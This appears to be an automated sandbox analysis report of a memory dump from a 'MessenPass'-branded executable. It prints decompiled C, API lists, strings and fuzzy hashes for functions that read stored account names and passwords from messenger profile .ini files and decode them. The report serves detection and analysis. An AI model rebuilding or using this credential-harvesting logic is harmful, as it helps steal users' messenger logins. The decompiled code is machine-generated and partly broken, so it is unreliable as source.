				if(_t54 > _t89) {
					do {
						_v532 = _t89;
						memset( &_v531, _t89, 0xfe);
						_v5148 = _t89;
						memset( &_v5147, _t89, 0x3ff);
						_v2076 = _t89;
						memset( &_v2075, _t89, 0x3ff);
						_v3100 = _t89;
						memset( &_v3099, _t89, 0x3ff);
						_v4124 = _t89;
						memset( &_v4123, _t89, 0x3ff);
						_push(_a8);
						sprintf( &_v532, "Account%3.3d");
						_t111 = _t111 + 0x48;
						GetPrivateProfileStringA( &_v532, "Account", 0x417c88,  &_v5148, 0x3ff,  &_v276);
						GetPrivateProfileStringA( &_v532, "Password", 0x417c88,  &_v2076, 0x3ff,  &_v276);
						if(_v2076 != _t89) {
							E004029D9( &_v2076,  &_v3100, 0x3ff);
							E0040DCF2( &_v4124,  &_v3100);
							_v1052 = _t89;
							_v796 = _t89;
							_v536 = 0xf;
							_v540 = 0x15;
							E00406958(0xff,  &_v796,  &_v4124);
							_t105 =  &_v1052;
							E00406958(0xff, _t105,  &_v5148);
							 *((intOrPtr*)( *_a4))(_t105);
							_t89 = 0;
						}
						_a8 =  &(_a8[1]);
						_t54 = _a8;
					} while (_t54 < _v8);
				}
				return _t54;
			}

0x0040e0a9
0x0040e0b6
0x0040e0c1
0x0040e0c7
0x0040e0cf
0x0040e0e0
0x0040e0e4
0x0040e0e9
0x0040e102
0x0040e0eb
0x0040e0f9
0x0040e0ff
0x0040e11a
0x0040e122
0x0040e125
0x0040e128
0x0040e133
0x0040e140
0x0040e146
0x0040e154
0x0040e15a
0x0040e168
0x0040e16e
0x0040e17c
0x0040e182
0x0040e190
0x0040e196
0x0040e19b
0x0040e1aa
0x0040e1b5
0x0040e1d8
0x0040e1fa
0x0040e202
0x0040e211
0x0040e221
0x0040e22c
0x0040e232
0x0040e244
0x0040e24e
0x0040e258
0x0040e264
0x0040e26a
0x0040e279
0x0040e27b
0x0040e27b
0x0040e27d
0x0040e280
0x0040e283
0x0040e133
0x0040e290

APIs

memset.MSVCRT ref: 0040E0C7
strlen.MSVCRT ref: 0040E0CF
strlen.MSVCRT ref: 0040E0DB
GetPrivateProfileIntA.KERNEL32(Accounts,num,00000000,?), ref: 0040E11A
memset.MSVCRT ref: 0040E146
memset.MSVCRT ref: 0040E15A
memset.MSVCRT ref: 0040E16E
memset.MSVCRT ref: 0040E182
memset.MSVCRT ref: 0040E196
sprintf.MSVCRT ref: 0040E1AA
GetPrivateProfileStringA.KERNEL32(?,Account,00417C88,?,000003FF,?), ref: 0040E1D8
GetPrivateProfileStringA.KERNEL32(?,Password,00417C88,?,000003FF,?), ref: 0040E1FA

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

Account%3.3d, xrefs: 0040E1A4
Accounts, xrefs: 0040E115
Account, xrefs: 0040E1CC
Password, xrefs: 0040E1EE
num, xrefs: 0040E110
accounts.ini, xrefs: 0040E0D4, 0040E0EB

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$PrivateProfile$Stringstrlen$_mbscat_mbscpysprintf
String ID: Account$Account%3.3d$Accounts$Password$accounts.ini$num
API String ID: 1850607429-3672167483
Opcode ID: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
Instruction ID: 3695b6fee04a76e8e88970007e36b309292cfce1d28ac10fc6c7acbfdb1ec453
Opcode Fuzzy Hash: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
Instruction Fuzzy Hash: A25193B184026CBECB10DB54DC86EDA77BCAF55304F1044FAB508E3141DA789FC98BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE6A, Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 127COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040EE81
_strcmpi.MSVCRT ref: 0040EE96
_strcmpi.MSVCRT ref: 0040EEAB
_strcmpi.MSVCRT ref: 0040EEC0
_strcmpi.MSVCRT ref: 0040EED5
_strcmpi.MSVCRT ref: 0040EEE6
_strcmpi.MSVCRT ref: 0040EEF7
_strcmpi.MSVCRT ref: 0040EF08
_strcmpi.MSVCRT ref: 0040EF19
_strcmpi.MSVCRT ref: 0040EF2E
_strcmpi.MSVCRT ref: 0040EF3F

Strings

jabber_1, xrefs: 0040EEE0
jabber, xrefs: 0040EECF
msn_1, xrefs: 0040EF02
aim, xrefs: 0040EE7B
icq, xrefs: 0040EEA5
yahoo, xrefs: 0040EF13
gg_1, xrefs: 0040EF39
aim_1, xrefs: 0040EE90
icq_1, xrefs: 0040EEBA
msn, xrefs: 0040EEF1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi
String ID: aim$aim_1$gg_1$icq$icq_1$jabber$jabber_1$msn$msn_1$yahoo
API String ID: 1439213657-55676784
Opcode ID: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
Instruction ID: d6ea28dcef1c43b6611216e97a84ccd45a66baff8fdfae9b3007c4cad2cc92f3
Opcode Fuzzy Hash: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
Instruction Fuzzy Hash: 2F31307324E3127AF714B9336D02BEB27898F11B66F24082FFA09B11C1EE7D5A55419E

Uniqueness

Uniqueness Score: -1.00%

Function 004124D4, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004124F5
memset.MSVCRT ref: 00412509
_mbscpy.MSVCRT ref: 00412536
sprintf.MSVCRT ref: 00412551
_mbscat.MSVCRT ref: 0041255E
sprintf.MSVCRT ref: 00412588
_mbscat.MSVCRT ref: 00412595
_mbscat.MSVCRT ref: 004125A3
_mbscat.MSVCRT ref: 004125B5
_mbscat.MSVCRT ref: 004125C0
_mbscat.MSVCRT ref: 004125D2
_mbscat.MSVCRT ref: 004125E4

Strings

<b>, xrefs: 004125AF
color="#%s", xrefs: 00412582
<font, xrefs: 00412530
</font>, xrefs: 004125DE
size="%d", xrefs: 0041254B
</b>, xrefs: 004125CC

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscat$memsetsprintf$_mbscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 633282248-1996832678
Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A242, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040A242(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* _t83;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr* _t112;
				signed int _t113;
				intOrPtr _t131;
				signed int _t144;
				signed int _t145;
				signed int _t148;
				intOrPtr* _t149;
				void* _t150;
				void* _t152;

				_t112 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t113 = 0xc;
				memcpy( &_v236, 0x418424, _t113 << 2);
				asm("movsb");
				_t148 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t152 = _t150 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					0x41241f(_t83,  &_v492);
					_push(_t83);
					sprintf( &_v132, " bgcolor="%s"");
					_t152 = _t152 + 0x14;
				}
				E004067EC(_a4, "<table border="1" cellpadding="5">");
				_v8 = _t148;
				if( *((intOrPtr*)(_t112 + 0x20)) > _t148) {
					while(1) {
						_t144 =  *( *((intOrPtr*)(_t112 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t144 << 4) +  *((intOrPtr*)(_t112 + 0x34)) + 4)) != _t148) {
							0x413d0c( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t148;
						_t149 = _a8;
						 *((intOrPtr*)( *_t112 + 0x30))(5, _v8, _t149,  &_v28);
						0x41241f(_v28,  &_v184);
						 *((intOrPtr*)( *_t149))(_t144,  *(_t112 + 0x4c));
						0x41244b();
						 *((intOrPtr*)( *_t112 + 0x48))( *((intOrPtr*)(_t112 + 0x50)), _t149, _t144);
						_t98 =  *((intOrPtr*)( *_t112 + 0x14))();
						_t145 = _t144 * 0x14;
						if(_t98 == 0xffffffff) {
							0x413d0c( *(_t112 + 0x54),  *((intOrPtr*)(_t145 + _v12 + 0x10)));
						} else {
							0x41241f(_t98,  &_v492,  *((intOrPtr*)(_t145 + _v12 + 0x10)));
							_push(_t98);
							sprintf( *(_t112 + 0x54), "<font color="%s">%s</font>");
							_t152 = _t152 + 0x10;
						}
						_t100 =  *((intOrPtr*)(_t112 + 0x50));
						_t131 =  *_t100;
						if(_t131 == 0 || _t131 == 0x20) {
							0x413cf4(_t100, "&nbsp;");
						}
						0x4124d4( *((intOrPtr*)(_t112 + 0x58)),  *((intOrPtr*)(_t112 + 0x50)));
						sprintf( *(_t112 + 0x4c),  &_v236,  &_v132,  *(_t112 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t112 + 0x58)));
						E004067EC(_a4,  *(_t112 + 0x4c));
						_t152 = _t152 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t112 + 0x20))) {
							goto L14;
						}
						_t148 = 0;
					}
				}
				L14:
				E004067EC(_a4, "</table><p>");
				return E004067EC(_a4, 0x417de8);
			}

0x0040a242
0x0040a25b
0x0040a262
0x0040a269
0x0040a275
0x0040a277
0x0040a27a
0x0040a281
0x0040a285
0x0040a294
0x0040a29b
0x0040a2a7
0x0040a2ab
0x0040a2b2
0x0040a2b7
0x0040a2c3
0x0040a2c6
0x0040a2d0
0x0040a2d5
0x0040a2df
0x0040a2e4
0x0040a2e4
0x0040a2ef
0x0040a2f9
0x0040a2fc
0x0040a306
0x0040a30c
0x0040a31b
0x0040a326
0x0040a32c
0x0040a32f
0x0040a333
0x0040a337
0x0040a33f
0x0040a342
0x0040a34d
0x0040a35a
0x0040a369
0x0040a36e
0x0040a37c
0x0040a383
0x0040a386
0x0040a38c
0x0040a3c1
0x0040a38e
0x0040a39d
0x0040a3a4
0x0040a3ad
0x0040a3b2
0x0040a3b2
0x0040a3c8
0x0040a3cb
0x0040a3cf
0x0040a3dc
0x0040a3e2
0x0040a3ec
0x0040a410
0x0040a41b
0x0040a420
0x0040a423
0x0040a42c
0x00000000
0x00000000
0x0040a304
0x0040a304
0x0040a306
0x0040a432
0x0040a43a
0x0040a452

APIs

memset.MSVCRT ref: 0040A262
memset.MSVCRT ref: 0040A285
memset.MSVCRT ref: 0040A29B
memset.MSVCRT ref: 0040A2AB
sprintf.MSVCRT ref: 0040A2DF
_mbscpy.MSVCRT ref: 0040A326
sprintf.MSVCRT ref: 0040A3AD
_mbscat.MSVCRT ref: 0040A3DC

Part of subcall function 0041241F: sprintf.MSVCRT ref: 0041243E

_mbscpy.MSVCRT ref: 0040A3C1
sprintf.MSVCRT ref: 0040A410

Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806

Strings

nowrap, xrefs: 0040A320
<font color="%s">%s</font>, xrefs: 0040A3A5
 , xrefs: 0040A3D6
</table><p>, xrefs: 0040A432
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040A26A
bgcolor="%s", xrefs: 0040A2D9
<table border="1" cellpadding="5">, xrefs: 0040A2E7

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 710961058-601624466
Opcode ID: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
Instruction ID: 690333ed3326df0f6eed54148ed3e596883a3b3feedda5c4c7dc15c04e40e9a4
Opcode Fuzzy Hash: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
Instruction Fuzzy Hash: 5B61AE31900208AFDF14DF54CC86EDE7B79EF08314F1001AAF909AB1D2DB799A94CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD65, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 178
stringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040DD65(intOrPtr* _a4, char* _a8, char* _a12, intOrPtr _a16) {
				void _v267;
				char _v268;
				void _v523;
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				int _v788;
				int _v1044;
				void _v2067;
				char _v2068;
				void _v3091;
				char _v3092;
				void _v4115;
				int _v4116;
				void* __ebx;
				void* __edi;
				int _t62;
				intOrPtr* _t95;
				int _t111;
				int _t118;
				intOrPtr* _t128;
				void* _t134;
				void* _t135;
				void* _t136;

				0x414060();
				_t111 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t62 = strlen(_a8);
				_t6 = strlen(_a12) + 1; // 0x1
				_t135 = _t134 + 0x14;
				if(_t62 + _t6 >= 0x104) {
					_v268 = 0;
				} else {
					E00406B4B( &_v268, _a8, _a12);
				}
				if(E004069D3( &_v268) != 0) {
					memset( &_v2067, _t111, 0x3ff);
					memset( &_v3091, _t111, 0x3ff);
					memset( &_v4115, _t111, 0x3ff);
					_v524 = _t111;
					memset( &_v523, _t111, 0xfe);
					_push(_t111);
					_a12 = _t111;
					_v2068 = _t111;
					_v3092 = _t111;
					_v4116 = _t111;
					sprintf( &_v524, "profile %d");
					_t136 = _t135 + 0x3c;
					GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
					GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
					if(_v2068 != _t111) {
						L7:
						while(_v3092 != _t111) {
							E0040DCF2( &_v4116,  &_v3092);
							_v528 = _a16;
							_v1044 = _t111;
							_v788 = _t111;
							_v532 = 3;
							E00406958(0xff,  &_v788,  &_v4116);
							_t128 =  &_v1044;
							E00406958(0xff, _t128,  &_v2068);
							_t118 = _v1044;
							_t95 = _t128;
							while(_t118 != 0) {
								if(_t118 >= 0x30 && _t118 <= 0x39) {
									_t95 = _t95 + 1;
									_t118 =  *_t95;
									continue;
								}
								L14:
								_push( &_v1044);
								if( *((intOrPtr*)( *_a4))() != 0) {
									_a12 =  &(_a12[1]);
									_push(_a12);
									_v2068 = 0;
									_v3092 = 0;
									_v4116 = 0;
									sprintf( &_v524, "profile %d");
									_t136 = _t136 + 0xc;
									GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
									GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
									if(_v2068 != 0) {
										_t111 = 0;
										goto L7;
									}
								}
								goto L16;
							}
							_v528 = 3;
							goto L14;
						}
					}
				}
				L16:
				return 1;
			}

0x0040dd6d
0x0040dd7a
0x0040dd85
0x0040dd8b
0x0040dd93
0x0040dda2
0x0040dda6
0x0040ddab
0x0040ddc2
0x0040ddad
0x0040ddb9
0x0040ddbf
0x0040ddd7
0x0040ddeb
0x0040ddf9
0x0040de07
0x0040de19
0x0040de1f
0x0040de24
0x0040de31
0x0040de34
0x0040de3a
0x0040de40
0x0040de46
0x0040de51
0x0040de74
0x0040de96
0x0040de9e
0x00000000
0x0040dea8
0x0040dec2
0x0040deca
0x0040ded6
0x0040dedc
0x0040deee
0x0040def8
0x0040df04
0x0040df0a
0x0040df11
0x0040df17
0x0040df28
0x0040df1e
0x0040df25
0x0040df26
0x00000000
0x0040df26
0x0040df36
0x0040df41
0x0040df46
0x0040df4c
0x0040df4f
0x0040df5e
0x0040df65
0x0040df6c
0x0040df73
0x0040df7e
0x0040dfa2
0x0040dfc0
0x0040dfc9
0x0040dea6
0x00000000
0x0040dea6
0x0040dfc9
0x00000000
0x0040df46
0x0040df2c
0x00000000
0x0040df2c
0x0040dea8
0x0040de9e
0x0040dfcf
0x0040dfd6

APIs

memset.MSVCRT ref: 0040DD8B
strlen.MSVCRT ref: 0040DD93
strlen.MSVCRT ref: 0040DD9D
memset.MSVCRT ref: 0040DDEB
memset.MSVCRT ref: 0040DDF9
memset.MSVCRT ref: 0040DE07
memset.MSVCRT ref: 0040DE1F
sprintf.MSVCRT ref: 0040DE46
GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DE74
GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DE96

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

sprintf.MSVCRT ref: 0040DF73
GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DFA2
GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DFC0

Strings

password, xrefs: 0040DE8A, 0040DFB4
profile %d, xrefs: 0040DE2B, 0040DF58
name, xrefs: 0040DE68, 0040DF96

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$PrivateProfileString$sprintfstrlen$_mbscat_mbscpy
String ID: name$password$profile %d
API String ID: 3544386798-2462908242
Opcode ID: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
Instruction ID: 9e46ac0295d5b354e730bb81602d93da8fcedc4e5bf25204c2bd197169999166
Opcode Fuzzy Hash: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
Instruction Fuzzy Hash: DA61A5B284425DAEDB20DB54DC40FDA77BCAF15304F1444EAA559E3141DBB89FC88FA4

Uniqueness

Uniqueness Score: -1.00%

Function 004125F1, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00412612
memset.MSVCRT ref: 00412626
memset.MSVCRT ref: 0041263A
sprintf.MSVCRT ref: 00412664
sprintf.MSVCRT ref: 0041268E
_mbscpy.MSVCRT ref: 0041269F
sprintf.MSVCRT ref: 004126BA
memset.MSVCRT ref: 004126F5
sprintf.MSVCRT ref: 00412710
sprintf.MSVCRT ref: 00412744

Part of subcall function 0041241F: sprintf.MSVCRT ref: 0041243E

Strings

<table border="1" cellpadding="5"><tr%s>, xrefs: 004126B4
width="%s", xrefs: 0041270A
<th%s>%s%s%s, xrefs: 0041273E
</font>, xrefs: 00412699
<font color="%s">, xrefs: 00412688
bgcolor="%s", xrefs: 0041265E

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: sprintf$memset$_mbscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 3402215030-3842416460
Opcode ID: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
Instruction ID: a5bfc8ec8e60557daa4b034ce7241d6b1778398f1e76627a293d7ac05c42f781
Opcode Fuzzy Hash: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
Instruction Fuzzy Hash: D24173B280121DBADB21EE54DC45FEB776CAF14309F0400ABF518E2142E6789FD88BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004010D0(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, signed short _a12) {
				void* __edi;
				void* _t28;
				void* _t37;
				unsigned int _t38;
				void* _t44;
				void* _t49;
				signed short _t50;
				struct HWND__* _t52;
				signed short _t58;
				struct HWND__* _t60;
				void* _t70;
				void* _t71;

				_t70 = __edx;
				_t28 = _a4 - 0x110;
				_t71 = __ecx;
				if(_t28 == 0) {
					SetWindowTextA( *(__ecx + 4), "MessenPass");
					SetDlgItemTextA( *(_t71 + 4), 0x3ea, _t71 + 0xc);
					SetDlgItemTextA( *(_t71 + 4), 0x3ec, _t71 + 0x10b);
					E00401085(_t71);
					E00406CAA(_t70,  *(_t71 + 4));
					L16:
					return 0;
				}
				_t37 = _t28 - 1;
				if(_t37 == 0) {
					_t38 = _a8;
					if(_t38 != 1 || _t38 >> 0x10 != 0) {
						goto L16;
					} else {
						EndDialog( *(__ecx + 4), 1);
						DeleteObject( *(_t71 + 0x20c));
						L7:
						return 1;
					}
				}
				_t44 = _t37 - 0x27;
				if(_t44 == 0) {
					if(_a12 != GetDlgItem( *(__ecx + 4), 0x3ec)) {
						goto L16;
					}
					SetBkMode(_a8, 1);
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(0xf);
				}
				_t49 = _t44 - 0xc8;
				if(_t49 == 0) {
					_t50 = _a12;
					_t52 = GetDlgItem( *(__ecx + 4), 0x3ec);
					_push(_t50 >> 0x10);
					_a12 = _t52;
					if(ChildWindowFromPoint( *(_t71 + 4), _t50 & 0x0000ffff) != _a12) {
						goto L16;
					}
					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
					goto L7;
				}
				if(_t49 != 0) {
					goto L16;
				}
				_t58 = _a12;
				_t60 = GetDlgItem( *(__ecx + 4), 0x3ec);
				_push(_t58 >> 0x10);
				_a12 = _t60;
				if(ChildWindowFromPoint( *(_t71 + 4), _t58 & 0x0000ffff) != _a12) {
					goto L16;
				}
				E00406D6B( *(_t71 + 4), _t71 + 0x10b);
				goto L7;
			}

0x004010d0
0x004010d6
0x004010de
0x004010e0
0x00401204
0x0040121c
0x0040122d
0x0040122f
0x00401237
0x0040123d
0x00000000
0x0040123d
0x004010e6
0x004010e7
0x004011cf
0x004011d6
0x00000000
0x004011e0
0x004011e5
0x004011f1
0x00401146
0x00000000
0x00401148
0x004011d6
0x004010ed
0x004010f0
0x004011a6
0x00000000
0x00000000
0x004011b1
0x004011bf
0x00000000
0x004011c7
0x004010f6
0x004010fb
0x0040114e
0x00401161
0x00401167
0x0040116c
0x00401178
0x00000000
0x00000000
0x0040118d
0x00000000
0x0040118d
0x004010ff
0x00000000
0x00000000
0x00401105
0x00401118
0x0040111e
0x00401123
0x0040112f
0x00000000
0x00000000
0x0040113f
0x00000000

APIs

GetDlgItem.USER32(?,000003EC), ref: 00401118
ChildWindowFromPoint.USER32(?,?,?), ref: 00401126

Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81

GetDlgItem.USER32(?,000003EC), ref: 00401161
ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
LoadCursorA.USER32(00000067), ref: 00401186
SetCursor.USER32(00000000,?,?), ref: 0040118D
GetDlgItem.USER32(?,000003EC), ref: 0040119D
SetBkMode.GDI32(?,00000001), ref: 004011B1
SetTextColor.GDI32(?,00C00000), ref: 004011BF
GetSysColorBrush.USER32(0000000F), ref: 004011C7
EndDialog.USER32(?,00000001), ref: 004011E5
DeleteObject.GDI32(?), ref: 004011F1
SetWindowTextA.USER32(?,MessenPass), ref: 00401204
SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D

Strings

MessenPass, xrefs: 004011FC

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
String ID: MessenPass
API String ID: 2410034309-1347981195
Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040C50E, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040C514
_strcmpi.MSVCRT ref: 0040C529

Strings

/stabular, xrefs: 0040C578
/sxml, xrefs: 0040C539
/scomma, xrefs: 0040C563
/stab, xrefs: 0040C54E
/shtml, xrefs: 0040C50F
/skeepass, xrefs: 0040C58D
/sverhtml, xrefs: 0040C524

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 1439213657-1959339147
Opcode ID: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
Instruction ID: dd15bb3cc8bdf641e1a17555e2464251a39e176c696be1a009fdff25c7df10cc
Opcode Fuzzy Hash: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
Instruction Fuzzy Hash: DE011AB229A32178F9286A773C07BD70A488B51F7BF70065FF408E40C1FE5C968054AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404D18, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D18(struct HINSTANCE__** __esi) {
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;

				if( *__esi == 0) {
					_t8 = LoadLibraryA("advapi32.dll");
					 *__esi = _t8;
					__esi[1] = GetProcAddress(_t8, "CryptAcquireContextA");
					__esi[2] = GetProcAddress( *__esi, "CryptReleaseContext");
					__esi[3] = GetProcAddress( *__esi, "CryptCreateHash");
					__esi[4] = GetProcAddress( *__esi, "CryptGetHashParam");
					__esi[5] = GetProcAddress( *__esi, "CryptHashData");
					_t14 = GetProcAddress( *__esi, "CryptDestroyHash");
					__esi[6] = _t14;
					return _t14;
				}
				return _t7;
			}

0x00404d1b
0x00404d23
0x00404d35
0x00404d40
0x00404d4c
0x00404d58
0x00404d64
0x00404d70
0x00404d73
0x00404d75
0x00000000
0x00404d78
0x00404d79

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73

Strings

CryptCreateHash, xrefs: 00404D45
advapi32.dll, xrefs: 00404D1E
CryptHashData, xrefs: 00404D5D
CryptAcquireContextA, xrefs: 00404D2F
CryptReleaseContext, xrefs: 00404D39
CryptGetHashParam, xrefs: 00404D51
CryptDestroyHash, xrefs: 00404D69

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
API String ID: 2238633743-1621422469
Opcode ID: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
Instruction ID: 844867562ca0833f301e0ac6fd14d3db62e181894ebadeef568166b0b2be0524
